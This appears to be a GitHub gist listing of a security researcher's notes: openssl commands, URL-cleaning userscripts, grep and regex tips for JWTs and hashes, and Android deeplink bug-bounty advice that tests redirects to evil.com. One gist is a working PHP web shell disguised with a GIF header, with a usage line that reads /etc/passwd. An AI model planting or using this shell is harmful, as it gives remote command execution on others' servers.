openssl s_client -state -connect postman-echo.com:443 | openssl x509 -text
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform der -in cacert.der -out cacert.crt
Sathish Kumar sathishshan
sathishshan
/ current_PR.js
Created
January 3, 2021 03:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Remove-UTM-from-URL | |
| // @namespace parameter_blocker | |
| // @description Removes UTM from url (by reloading) | |
| // @version 1.0 | |
| // @include https://www.naukri.com/job-listings* | |
| // @run-at document-start | |
| // ==/UserScript== | |
| var loc = window.top.location.toString(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF8; | |
| <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> | |
| <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> |
sathishshan
/ grep.txt
Created
December 31, 2020 09:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| grep -Porn <pattern> | |
| P: Use Perl engine, grep can't run modern regexes otherwise | |
| o: Only show the matching part, not the whole line | |
| r: Search recursively | |
| n: Print line number of matches | |
| Bonus: use -Porh to exclude filenames from output i.e. only show matches. Great for piping. |
Regex to match JWTs
[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*
sathishshan
/ hash_matcher.md
Last active
December 31, 2020 09:29
Regex to match MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512 hashes in case someone needs it.
([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)
sathishshan
/ parameter_blocker.js
Last active
December 31, 2020 06:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Remove_Params | |
| // @namespace parameter_blocker | |
| // @description Remove any parameter from the url | |
| // @version 1.0 | |
| // @include * | |
| // @run-at document-start | |
| // ==/UserScript== | |
| var loc = window.top.location.toString(); |
sathishshan
/ remove_param.js
Last active
January 1, 2021 06:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Remove-UTM-from-URL | |
| // @namespace parameter_blocker | |
| // @description Removes UTM from url (by reloading) | |
| // @version 1.0 | |
| // @include https://www.naukri.com/job-listings* | |
| // @run-at document-start | |
| // ==/UserScript== | |
| var loc = window.top.location.toString(); |
sathishshan
/ deeplink.md
Created
August 17, 2020 05:17
You must love #Android deeplinks! They are the easiest way to get bounties
-
Decompile an app with jadx
-
Collect all deeplink handlers from AndroidManifest.xml, they look like
-
Grep among all sources and resources a pattern from a handler, in this case, airbnb://d
-
You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// http://airbnb.com/blabla. That's much simpler than learning app's sources
-
Now try to put your own domains with adb (adb shell am start -a android.intent.action.VIEW -d airbnb://d/openurl?url=http:// http://evil.com) or on HTML pages (check out the H1 report below)
-
Repeat the same thing for iOS apps. Usually, functionality is similar, but actual implementations are different
sathishshan
/ Gmail-OSINT.md
Last active
December 31, 2020 03:53